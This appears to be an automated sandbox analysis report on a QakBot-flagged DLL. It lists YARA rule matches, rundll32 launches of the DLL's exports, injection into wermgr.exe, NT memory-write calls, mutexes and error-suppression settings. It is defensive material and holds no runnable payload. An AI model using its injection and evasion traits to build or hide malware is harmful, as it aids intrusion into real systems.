Source: 20.2.rundll32.exe.5f1170.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
Source: 20.2.rundll32.exe.ad0000.1.unpack, type: UNPACKEDPE Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
Source: 20.2.rundll32.exe.5f1170.0.unpack, type: UNPACKEDPE Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2460 -s 652
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000D060 3_2_1000D060
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10028070 3_2_10028070
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1002B0B0 3_2_1002B0B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000B0D0 3_2_1000B0D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10008144 3_2_10008144
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1002A1A1 3_2_1002A1A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100101D0 3_2_100101D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1001021B 3_2_1001021B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10027220 3_2_10027220
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10033261 3_2_10033261
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10007270 3_2_10007270
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10024280 3_2_10024280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10023350 3_2_10023350
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100353B0 3_2_100353B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100243C0 3_2_100243C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10013480 3_2_10013480
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1004D4B0 3_2_1004D4B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1004C4C0 3_2_1004C4C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000D4D0 3_2_1000D4D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1001F523 3_2_1001F523
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100105C0 3_2_100105C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100215D0 3_2_100215D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000164B 3_2_1000164B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100206A7 3_2_100206A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10010750 3_2_10010750
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000E760 3_2_1000E760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10010778 3_2_10010778
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1002A800 3_2_1002A800
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10030800 3_2_10030800
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000B830 3_2_1000B830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10026870 3_2_10026870
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10001900 3_2_10001900
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10091900 3_2_10091900
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000D910 3_2_1000D910
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1001F91B 3_2_1001F91B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1009D970 3_2_1009D970
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10010980 3_2_10010980
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1001099C 3_2_1001099C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100339B9 3_2_100339B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000C9F0 3_2_1000C9F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000FA00 3_2_1000FA00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000AA10 3_2_1000AA10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10091A40 3_2_10091A40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10007A50 3_2_10007A50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000EAC0 3_2_1000EAC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000FAE0 3_2_1000FAE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000FAF7 3_2_1000FAF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10025B0C 3_2_10025B0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000AB30 3_2_1000AB30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10003BA5 3_2_10003BA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000FBC0 3_2_1000FBC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10001C10 3_2_10001C10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000DC10 3_2_1000DC10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000EC10 3_2_1000EC10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10031C30 3_2_10031C30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000BC40 3_2_1000BC40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10004C96 3_2_10004C96
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000ECC9 3_2_1000ECC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000DD40 3_2_1000DD40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000CD50 3_2_1000CD50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1002DD90 3_2_1002DD90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1000EDB0 3_2_1000EDB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10007DC0 3_2_10007DC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00AE71FF 20_2_00AE71FF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00AE8D30 20_2_00AE8D30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00AE320D 20_2_00AE320D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00AE4A6F 20_2_00AE4A6F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00AD3A40 20_2_00AD3A40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00AE6E40 20_2_00AE6E40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00ADA823 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory, 20_2_00ADA823
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00ADA412 NtAllocateVirtualMemory,NtWriteVirtualMemory, 20_2_00ADA412
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00ADCA0F NtAllocateVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,NtFreeVirtualMemory, 20_2_00ADCA0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00AE43F4 NtProtectVirtualMemory,NtProtectVirtualMemory, 20_2_00AE43F4
Source: A290.dll Binary or memory string: OriginalFilenameavutil-lav-57.dll. vs A290.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wermgr.exe Section loaded: ncryptsslp.dll
Source: A290.dll Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\A290.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\A290.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A290.dll,mv_add_i
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2460 -s 652
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 660
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A290.dll,mv_add_q
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A290.dll,mv_add_stable
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5616 -s 652
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",mv_add_i
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",mv_add_q
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",mv_add_stable
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",next
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",mvutil_license
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6944 -s 652
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",mvutil_configuration
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 652
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\A290.dll",#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A290.dll,mv_add_i Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A290.dll,mv_add_q Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A290.dll,mv_add_stable Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",mv_add_i Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",mv_add_q Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",mv_add_stable Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",next Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",mvutil_license Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",mvutil_configuration Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\A290.dll",#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Ymdmdosqoawo
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER8532.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winDLL@31/24@2/100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00ADD213 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket, 20_2_00ADD213
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00ADC71C CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, 20_2_00ADC71C
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\A290.dll,mv_add_i
Source: C:\Windows\SysWOW64\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\{C2305DE9-81F7-4032-97E9-671A0F043C28}
Source: C:\Windows\SysWOW64\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{281F1E04-E2C5-4D9F-895E-6E44B85850EA}
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2460
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5616
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5508
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5860
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6944
Source: C:\Windows\SysWOW64\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\{281F1E04-E2C5-4D9F-895E-6E44B85850EA}
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\wermgr.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\wermgr.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\wermgr.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: A290.dll Static PE information: More than 582 > 100 exports found
Source: A290.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1001F523 mv_dict_get,LoadLibraryA,LoadLibraryA,InitOnceBeginInitialize,InitOnceComplete,LoadLibraryA,GetProcAddress,mv_log,atoi,mv_log,mv_log,GetProcAddress, 3_2_1001F523
Source: A290.dll Static PE information: real checksum: 0xf1b7b should be: 0x100382

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6632 base: D03C50 value: E9 63 D7 45 FF Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
